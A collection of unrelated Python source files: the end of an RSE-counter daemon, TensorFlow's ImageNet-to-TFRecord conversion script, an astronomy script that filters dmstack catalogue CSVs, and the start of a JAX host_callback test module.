logging.debug('rse_update[%s/%s]: update of rse "%s" took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rse_id, time.time() - start_time))
except Exception:
logging.error(traceback.format_exc())
if once:
break
logging.info('rse_update: graceful stop requested')
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
logging.info('rse_update: graceful stop done')
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, fill_history_table=False):
"""
Starts up the Abacus-RSE threads.
"""
executable = 'abacus-rse'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
logging.info('main: executing one iteration only')
rse_update(once)
else:
logging.info('main: starting threads')
threads = [threading.Thread(target=rse_update, kwargs={'once': once}) for i in range(0, threads)]
if fill_history_table:
threads.append(get_thread_with_periodic_running_function(3600, fill_rse_counter_history_table, graceful_stop))
[t.start() for t in threads]
logging.info('main: waiting for interrupts')
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with open(filename, 'r') as f:
image_data = f.read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
b01_remove_nans_dmstack.py
|
# Author : Bhishan Poudel
# Date : July 5, 2019
# Update : Nov 7, 2019
# Description:
#===============
# Remove nans from dmstack output csv files and
# do some filterings to give txt files.
#
# Input/Oputputs:
#=================
# inputs : ../data/dmstack_csv/*.csv (100*4 csv files)
# outputs: dmstack_txt/*.txt (100 combined txt files with few columns)
#
# Filtering:
#============
# 1. column ==> deblend_nChild==0
# 2. flag ==> calib_psfCandidate==False **Read flag from json**
# 3. ellipticity ==> e = sqrt(e1^2 + e2^2) < 1.5
# 4. selection ==> choose only few columns
# 5. nans ==> remove nans from all selected columns
# 6. delimiter ==> change delimiter from space to tab for imcat
#
# Shape HSM Filtering:
#======================
# Nov 19, 2019
# Reference: https://github.com/LSSTDESC/DC2-analysis/blob/master/tutorials/object_gcr_2_lensing_cuts.ipynb
#
# 7. 'ext_shapeHSM_HsmShapeRegauss_resolution >= 0.3'
# 8. 'ext_shapeHSM_HsmShapeRegauss_sigma <= 0.4'
#
# Usage:
#=======
# py b01_remove_nans_dmstack.py
#
#
# Note:
# When reading columns ext_shapeHSM_HsmShapeRegauss_e1 and e2
# we read them combinedly as g in IMCAT, so original
# reduced shear will be g = g/2.
#
import pandas as pd
import numpy as np
import os,sys
import glob
import json
import multiprocessing
from multiprocessing import Process
# constants
RANGE = 100
# global variables
dict_flags_all = json.load(open('dict_flags.json'))
# create output folder if not exist
if not os.path.isdir('dmstack_txt'):
os.makedirs('dmstack_txt')
def remove_nans(ifile,file_number):
""" Remove nans and filter data from dmstack output csv file.
There are 90 flags col0 to col89
col90 is id is first column 'id'
There are 90 flags and 77 columns.
We exclude first column 'flags' and have 76 columns
In total there are 90 + 76 = 166 columns.
Columns selected:
# flags only for filtering
1 : calib_psfCandidate (for filtering only)
94 : deblend_nChild (for filtering only)
# actual columns used
90 : id
102 : base_SdssCentroid_x
103 : base_SdssCentroid_y
104 : base_SdssCentroid_xSigma
105 : base_SdssCentroid_ySigma
114 : 'base_SdssShape_flux',
127 : ext_shapeHSM_HsmShapeRegauss_e1
128 : ext_shapeHSM_HsmShapeRegauss_e2
# Added on Nov19, 2019 for shape measurements
# https://github.com/LSSTDESC/DC2-analysis/blob/master/tutorials/object_gcr_2_lensing_cuts.ipynb
129: 'ext_shapeHSM_HsmShapeRegauss_sigma',
130: 'ext_shapeHSM_HsmShapeRegauss_resolution',
# Added for radius calculation
133: 'ext_shapeHSM_HsmSourceMoments_xx',
134: 'ext_shapeHSM_HsmSourceMoments_yy',
135: 'ext_shapeHSM_HsmSourceMoments_xy',
# This gives
radius = (xx*yy - xy**2)**1/4
# In the output file we have
# 1 2 34 56 78 9 10 11
file_number, id, x,y xsigma,ysigma, e1,e2, ellip flux, radius
"""
df = pd.read_csv(ifile, sep=",",low_memory=False)
df.columns = df.columns.str.lstrip('# ')
# make dtype float
df = df.astype(float)
# select only few columns
usecols = [1, 94, 90, 102, 103, 104, 105,
127, 128, 129, 130, 114, 133, 134, 135]
df = df.iloc[:,usecols]
df = df.copy()
# make selected columns numeric
for c in df.columns:
df[c] = pd.to_numeric(df[c],errors='coerce')
# filter the flag calib_psfCandidate==False
# not a star candidate
df = df.query('calib_psfCandidate == 0.0')
# filter the column deblend_nChild==0
# no child source after deblending
df = df.query('deblend_nChild == 0.0')
# filter for HSM shapes
df = df.query('ext_shapeHSM_HsmShapeRegauss_resolution >= 0.3')
df = df.query('ext_shapeHSM_HsmShapeRegauss_sigma <= 0.4')
# clean out unphysical results
# e1^2 + e2^2 < 1.5^2
df = df.copy()
df['ellip'] = (df['ext_shapeHSM_HsmShapeRegauss_e1'] ** 2 +
df['ext_shapeHSM_HsmShapeRegauss_e2'] ** 2)**0.5
df = df.query('ellip < 1.5')
# calculate radius of ellipse using HSM moments
# radius**4 = xx*yy - xy**2
df['radius'] = df.eval(""" ( (ext_shapeHSM_HsmSourceMoments_xx * ext_shapeHSM_HsmSourceMoments_yy) \
- (ext_shapeHSM_HsmSourceMoments_xy**2 ) )**0.25 """)
# add a new column with file_number
df['file_number'] = file_number
# take only required columns
cols_select = ['file_number', 'id',
'base_SdssCentroid_x', 'base_SdssCentroid_y',
'base_SdssCentroid_xSigma','base_SdssCentroid_ySigma',
'ext_shapeHSM_HsmShapeRegauss_e1','ext_shapeHSM_HsmShapeRegauss_e2',
'ellip', 'base_SdssShape_flux', 'radius'
]
df = df[cols_select]
# drop all nans
df = df.dropna()
# write txt file with commented header
prefix = ' '*2
header_line = prefix.join(cols_select)
# from: ../data/dmstack_csv/src_lsst_mono_z1.5_000.csv
# to : dmstack_txt/src_lsst_mono_z1.5_000.txt
ofile = ifile.replace('../data/dmstack_csv', 'dmstack_txt')
ofile = ofile.replace('.csv', '.txt')
np.savetxt(ofile,df.values,header=header_line,delimiter='\t')
def func1():
infiles = ['../data/dmstack_csv/src_lsst_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
def func2():
infiles = ['../data/dmstack_csv/src_lsst90_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
def func3():
infiles = ['../data/dmstack_csv/src_lsst_mono_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
def func4():
infiles = ['../data/dmstack_csv/src_lsst_mono90_z1.5_{:03d}.csv'.format(i) for i in range(RANGE)]
for ifile in infiles:
file_number = int(ifile.rstrip('.csv').split('_')[-1])
remove_nans(ifile, file_number)
if __name__ == '__main__':
p1 = Process(target=func1)
p1.start()
p2 = Process(target=func2)
p2.start()
p3 = Process(target=func3)
p3.start()
p4 = Process(target=func4)
p4.start()
# join them all
p1.join()
p2.join()
p3.join()
p4.join()
|
host_callback_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import core
from jax._src import api
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax import tree_util
from jax.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
# Tests require using not more than 2 devices.
return api.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
